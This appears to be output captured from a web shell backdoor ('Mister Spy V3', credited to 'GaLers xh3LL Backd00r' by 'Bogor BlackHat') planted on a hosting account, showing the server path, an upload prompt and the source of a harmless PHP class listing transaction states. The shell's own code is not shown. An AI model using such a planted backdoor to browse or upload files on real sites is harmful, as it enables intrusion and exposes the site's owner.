Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/web/library/
Upload File :
Current File : /home/caballoscriollos/public_html/web/library/class.transaccionestados.php

<?php

abstract class TransaccionEstados
{ 		
	const Aprobada 	= 1;
	const Pendiente = 2;
	const Anulada	= 3;
	const Entregada	= 4;

	static function GetById($IdEstado)
	{
		switch($IdEstado)
		{				
			case self::Aprobada:
				return "Aprobada";

			case self::Pendiente:
				return "Pendiente";
				
			case self::Anulada:
				return "Anulada";

			case self::Entregada:
				return "Entregada";				

			default:
				return "No Asignado";
		}
	}
	
	
	static function GetColorById($IdEstado)
	{
		switch($IdEstado)
		{				
			case self::Aprobada:
				return "<span style=\"color:#002AFF;\">Aprobada</span>";

			case self::Pendiente:
				return "<span style=\"color:#E0B82F;\">Pendiente</span>";
				
			case self::Anulada:
				return "<span style=\"color:#FF0000;\">Anulada</span>";

			case self::Entregada:
				return "<span style=\"color:#009800;\">Entregada</span>";				

			default:
				return "No Asignado";
		}
	}
	
	
	static function GetAll()
	{
		return array
		(
			array("IdEstado" => self::Pendiente, 	"Descripcion" => "Pendiente"),
			array("IdEstado" => self::Aprobada, 	"Descripcion" => "Aprobada"),
			array("IdEstado" => self::Anulada, 		"Descripcion" => "Anulada"),
			array("IdEstado" => self::Entregada, 	"Descripcion" => "Entregada")
		);
	}
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat